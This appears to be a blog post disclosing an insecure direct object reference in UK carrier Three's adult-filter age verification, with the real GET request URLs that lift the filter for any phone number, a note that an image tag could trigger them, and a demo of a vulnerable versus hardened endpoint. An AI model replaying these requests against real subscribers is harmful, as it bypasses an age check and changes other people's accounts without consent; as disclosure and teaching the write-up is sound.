In case you don’t know what Three is, it’s a mobile carrier (my carrier) in the UK. Here the Digital Economy Act 2017 was scheduled to bring in mandatory age verification for access to adult websites from 15 July 2019. What does age verification involve on Three? Entering your credit card details to have the network’s adult content filter lifted.

Just out of interest, I inspected it for horrible logic flaws. I wasn’t surprised. Firstly, the whole verification flow is driven from client-side JavaScript.

var AdultVerification = function(msisdn, banId, isPaymentIntiated) {
  // snip
  // Flips the adult filter for the given MSISDN. Both the subscriber ID and
  // the new status are supplied by the caller; nothing ties them to a session.
  this.toggleStatus = function(msisdn, status, callBack) {
    var ageVerifyInst = this;
    // Plain GET with the MSISDN and the desired status in the query string.
    my3AdultVerificationDefaults.ajaxifyGET(toggleStatusRESTUrl + '?msisdn=' + msisdn + '&status=' + status, false, callBack, function(errText) {
      ageVerifyInst.showAdultVerificationSystemErrorContainer(errText);
    });
    return this;
  };
  // snip
};

The client-side code that sets the verification status (the rest of the object snipped).

So a user could simply call adultVerification.toggleStatus from the browser console to reset the flag. But that’s not all. You’re probably wondering what msisdn is. It is the subscriber’s identifier: the phone number in international format with the leading plus stripped. If the phone number is +44 1234567890, the MSISDN is 441234567890. Nothing stops you from changing it to any other number.

That’s right: an IDOR (Insecure Direct Object Reference) vulnerability. The server never checks that the msisdn in the request belongs to the caller. In fact, the only check performed is that the request arrives over Three’s network.

The actual requests sent (all GET), each followed by the JSON it returned:

https://smobile.three.co.uk/SceRestService/SSOUserRestService/rest/userDetails/hasActiveAdultFilter?msisdn=441234567890
--> {statusMessage: "hasActiveAdultFilterJson for user 441234567890 Filter status true", status: 0, statusCode: 1}
https://smobile.three.co.uk/SceRestService/SSOUserRestService/rest/userDetails/toggleAdultFilter?msisdn=441234567890&status=0
--> {statusMessage: "Toggle Adult Filter Success for User 441234567890", status: 0, statusCode: 0}
https://smobile.three.co.uk/SceRestService/SSOUserRestService/rest/userDetails/hasActiveAdultFilter?msisdn=441234567890
--> {statusMessage: "hasActiveAdultFilterJson for user 441234567890 Filter status false", status: 0, statusCode: 0}

Because they are GET requests that change state (bad web development practice in itself), you don’t even need the JavaScript: pasting the toggle URL into the browser’s address bar while on the mobile connection resets the flag. A side-effecting GET whose only authorisation is the network connection could in principle also be fired by any page loaded over that connection, for example from an image tag.
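To make the two problems above concrete (the unchecked msisdn and the state-changing GET), here is an added example, not Three’s code: a small in-memory model of the toggleAdultFilter endpoint written first as the observed behaviour, then hardened. The subscriber numbers, the session objects, the age-verification set and all function names are constructed for this demo; the real service’s internals are not known.

```javascript
// Added example (not Three's code). Models the toggleAdultFilter endpoint as
// observed (any msisdn in the query string is trusted) and then hardened
// (identity comes from the authenticated session, state changes need POST).
// Numbers, sessions and the stores below are constructed for the demo.

// Filter state per subscriber: true = adult filter active.
const filterStore = new Map();
// MSISDNs that completed the credit-card age check (server-side record).
const ageVerified = new Set();

function resetDemoState() {
  filterStore.clear();
  filterStore.set("441234567890", true);  // victim, filter on
  filterStore.set("447000000001", true);  // attacker's own line, filter on
  ageVerified.clear();
}
resetDemoState();

// What the network knows about a connection: that it is on-net, and which
// line it actually belongs to. The observed endpoint only used the first bit.
function makeSession(msisdn) {
  return { onNetwork: true, msisdn };
}

function parseQuery(url) {
  return Object.fromEntries(new URL(url, "https://example.invalid").searchParams);
}

// Vulnerable: mirrors the behaviour described in the post. The msisdn
// parameter is trusted as-is; the only gate is being on the network.
function toggleAdultFilterVulnerable(method, url, session) {
  if (!session.onNetwork) return { statusCode: 1, statusMessage: "Not on network" };
  const { msisdn, status } = parseQuery(url);
  if (!filterStore.has(msisdn)) return { statusCode: 1, statusMessage: "Unknown user" };
  filterStore.set(msisdn, status !== "0");  // status=0 lifts the filter
  return { statusCode: 0, statusMessage: `Toggle Adult Filter Success for User ${msisdn}` };
}

// Hardened: the object acted on is always the caller's own line (closes the
// IDOR), a client-supplied msisdn that disagrees is refused, state changes
// require POST, and lifting the filter needs a completed verification record.
function toggleAdultFilterHardened(method, url, session, body = {}) {
  if (!session.onNetwork) return { statusCode: 1, statusMessage: "Not on network" };
  if (method !== "POST") return { statusCode: 405, statusMessage: "Method Not Allowed" };
  const subject = session.msisdn;
  if (body.msisdn !== undefined && body.msisdn !== subject) {
    return { statusCode: 403, statusMessage: "Forbidden" };
  }
  const disable = body.status === 0;
  if (disable && !ageVerified.has(subject)) {
    return { statusCode: 403, statusMessage: "Age verification required" };
  }
  filterStore.set(subject, !disable);
  return { statusCode: 0, statusMessage: `Toggle Adult Filter Success for User ${subject}` };
}

function hasActiveAdultFilter(msisdn) {
  return filterStore.get(msisdn);
}

// Replays the attack against both versions and returns the outcomes.
function runDemo() {
  resetDemoState();
  const attacker = makeSession("447000000001");
  const out = {};
  out.vulnerableGet = toggleAdultFilterVulnerable(
    "GET", "/toggleAdultFilter?msisdn=441234567890&status=0", attacker);
  out.victimFilterAfterVulnerable = hasActiveAdultFilter("441234567890");
  resetDemoState();
  out.hardenedGet = toggleAdultFilterHardened(
    "GET", "/toggleAdultFilter", attacker, { msisdn: "441234567890", status: 0 });
  out.hardenedOtherUser = toggleAdultFilterHardened(
    "POST", "/toggleAdultFilter", attacker, { msisdn: "441234567890", status: 0 });
  out.victimFilterAfterHardened = hasActiveAdultFilter("441234567890");
  out.hardenedUnverifiedSelf = toggleAdultFilterHardened(
    "POST", "/toggleAdultFilter", attacker, { status: 0 });
  ageVerified.add("447000000001");
  out.hardenedVerifiedSelf = toggleAdultFilterHardened(
    "POST", "/toggleAdultFilter", attacker, { status: 0 });
  out.attackerFilterAfterHardened = hasActiveAdultFilter("447000000001");
  resetDemoState();
  return out;
}

console.log(JSON.stringify(runDemo(), null, 2));
```

The vulnerable version reproduces the post’s observation exactly: a connection belonging to 447000000001 lifts the filter on 441234567890 with one GET. The hardened version never reads the subscriber from the request at all; the session (in a real deployment, the identity the network attaches to the connection) is the only source of truth, and a mismatching msisdn in the body is treated as an attack rather than silently ignored.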

What does this mean for the Digital Economy Act 2017 and the BBFC? I think that it shouldn’t matter. Most kids would be unable to connect to the phone via USB (no, hotspot doesn’t work) and to run commands in the JS console. But either way this is an interesting bug.